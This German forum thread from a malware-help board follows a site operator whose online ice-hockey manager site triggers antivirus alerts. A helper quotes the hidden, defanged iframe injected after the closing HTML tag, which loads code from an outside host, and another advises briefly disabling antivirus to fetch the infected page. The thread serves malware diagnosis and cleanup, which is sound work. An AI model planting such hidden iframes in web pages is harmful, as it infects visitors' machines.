| |
| |||||||
Plagegeister aller Art und deren Bekämpfung: Homepage befallen? Kann doch nicht...Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen. |
 |
20.02.2013, 22:10
| #1 |
 |  Homepage befallen? Kann doch nicht... Hallo, Ich stehe vor einem Rätsel. Ich betreibe mit einigen Kollegen einen Online Eishockey Manager und wir haben seit einiger Zeit das Problem, das bei einigen Managern deren Virenprogramm (in den meisten Fällen antivir) beim Besuch unserer Homepage/Forum, Alarm schlägt. Bei einem Mitglied hat sich sogar angeblich nach dem Besuch unserer Homepage etwas mit dem Namen "system progressive protection" installiert und er hat daraufhin wohl einen Großteil seiner Daten verloren... Nur begreife ich das ganze nicht... Ich selber nutzte bis vergangenen Monat noch Kaspersky, welches NIE beim Besuch der Seite gemeckert hatte, auch wenn ich von der Arbeit aus die Seite aufgerufen habe, gab es nie Meldungen in der Art und dort nutzen wir Norton... Auch bei einigen anderen Managern gab es nie solche Meldungen... Darum kann ich das ganze nicht so recht glauben, das die Seite wirklich befallen ist.. Ich habe die Seite auch schon von Norton Safe Web scannen lassen, alles tadellos... Auch google sagt, die Seite ist frei von jeglicher Malware... Gleiche gilt für Websitedefender... auch dort wird mir gesagt, die Seite ist sauber... Auch mein Hoster, sagt mir das diese keinerlei Meldungen erhalten haben... Wenn dem so wäre, wären die befallenen Dateien/Seiten auch schon längst gesperrt worden... Ist es denn möglich, das der Befall sich nur auf bestimmte User auswirkt? Finde es halt nur komisch, das bei manchen das Virenprogramm meckert, einer sogar einen richtigen Befall hatte und die meisten überhaupt keine Probleme haben... Und das die Virenprogramme hin und wieder meckern ist ja auch nicht ungewöhnlich... Google Chrome meckert bei mir hin und wieder auch, wenn ich mal eine Seite (z.B. Forenseite von meinem Fussballverein, meinem Lieblingsitaliener) aufrufe, diese sei Malware verseucht etc. Könnt ihr mir weiterhelfen? Möchte nicht unnötig die Homepage platt machen... mfg Vain |
|
20.02.2013, 22:12
| #2 |
| /// Malware-holic   | Homepage befallen? Kann doch nicht... Hi ein paar der fundmeldungen hier währen interessant.
__________________übrigens bei der Rogue gehen die Daten nicht verloren, der gute Mann soll sich mal hier melden. die seite währe auch günstig.
__________________ |
|
20.02.2013, 22:29
| #3 |
| | Homepage befallen? Kann doch nicht... Also die Seite ist:
__________________hxxp://www-tiger-area.com und das Forum ist über: hxxp://tiger-area.com/wbb3/ zu erreichen. Also Fundmeldungen waren: Web Attack Toolkit Website 8 Angreifender PC : Panelallegro.1110.pl bei nem anderen ist die Seite gesperrt worden mit der Begründung "unsicheres Programm" |
|
20.02.2013, 22:30
| #4 |
| /// Malware-holic | Homepage befallen? Kann doch nicht... die hier oder? onlineeishockeymanager.de
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
20.02.2013, 22:35
| #5 | |
| | Homepage befallen? Kann doch nicht...Zitat:
bzw. forum: tiger-area.com/wbb3/ |
|
20.02.2013, 23:10
| #6 |
| /// Helfer-Team  | Homepage befallen? Kann doch nicht... Halli Hallo  die Frameset-Seite von tiger-area.com ist in jedem Fall verseucht! Zum Schluss wird noch hinter dem schließenden HTML-Tag ein Inlineframe eingebunden: Code:
ATTFilter <iframe src="hxxp://illadearousa.com/counter.php" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/>
Dessen Inhalt hab ich noch nicht so gerafft (very obfuscated  )- Fortsetzung folgt.Am besten, du suchst in jedem Fall die gesamte Seite einmal durch. Wer weiß, was da noch so rumschwirrt... Einen schönen Abend noch
__________________ --> Homepage befallen? Kann doch nicht... |
|
20.02.2013, 23:20
| #7 |
| /// Malware-holic | Homepage befallen? Kann doch nicht... hi danke, währs möglich eine Kopie der Index.php zu bekommen? bei File-Upload.net - Ihr kostenloser File Hoster! hochladen, link an mich als private nachicht. ps von der tiger-area.com
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
20.02.2013, 23:23
| #8 |
| /// Malware-holic | Homepage befallen? Kann doch nicht... @handball10 schön mal wieder von dir zu lesen :-)
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
20.02.2013, 23:30
| #9 | |
| | Homepage befallen? Kann doch nicht... schonmal vielen dank euch beiden, habe die index.php geschickt. jedoch vom forum. denn bei tiger-area.com ist die index ja eine .htm seite... Hoffe das ist richtig so Zitat:
habe mir jetzt einfach mal die startseite runtergezogen, also die index.htm... und jetzt meckert auch kaspersky bei mir und löscht die datei sofort... |
|
20.02.2013, 23:36
| #10 |
| /// Malware-holic | Homepage befallen? Kann doch nicht... hi dann die index.html.
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
20.02.2013, 23:40
| #11 |
| | Homepage befallen? Kann doch nicht... problem ist, ich bekomme die nich heruntergeladen... kaspersky löscht die sofort ... oder kann ich da eine ausnahme setzen? also die datei erlauben? |
|
20.02.2013, 23:41
| #12 |
| /// Malware-holic | Homepage befallen? Kann doch nicht... müsste sich kurzfristig deaktivieren lassen, versuch mal über rechtsklick auf das Symbol im Infobereich.
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
20.02.2013, 23:46
| #13 |
| | Homepage befallen? Kann doch nicht... hab dir die datei geschickt |
|
20.02.2013, 23:49
| #14 |
| /// Malware-holic | Homepage befallen? Kann doch nicht... danke. hast du backups deiner homepages? dann könnte man die einspielen, natürlich vorher schauen ob das frame eingebunden ist am ende der seite.
__________________ -Verdächtige mails bitte an uns zur Analyse weiterleiten: markusg.trojaner-board@web.de Weiterleiten Anleitung: http://markusg.trojaner-board.de Mails bitte vorerst nach obiger Anleitung an markusg.trojaner-board@web.de Weiterleiten Wenn Ihr uns unterstützen möchtet |
|
20.02.2013, 23:52
| #15 |
| | Homepage befallen? Kann doch nicht... das backup ist leider auch befallen... Würd es denn reichen, wenn ich die frames aus allen seiten rauslösche? habs gerade mal testweise bei einer seite gemacht, jetzt bleibt kaspersky bei dieser ruhig |
|
| Themen zu Homepage befallen? Kann doch nicht... |
| alarm, antivir, bestimmte, daten, gesperrt, google, homepage, installiert, kaspersky, manager, meldungen, namen, nutzen, nutzte, online, problem, probleme, programm, programme, scan, scannen, seite, system, verseucht, web |
Linear-Darstellung
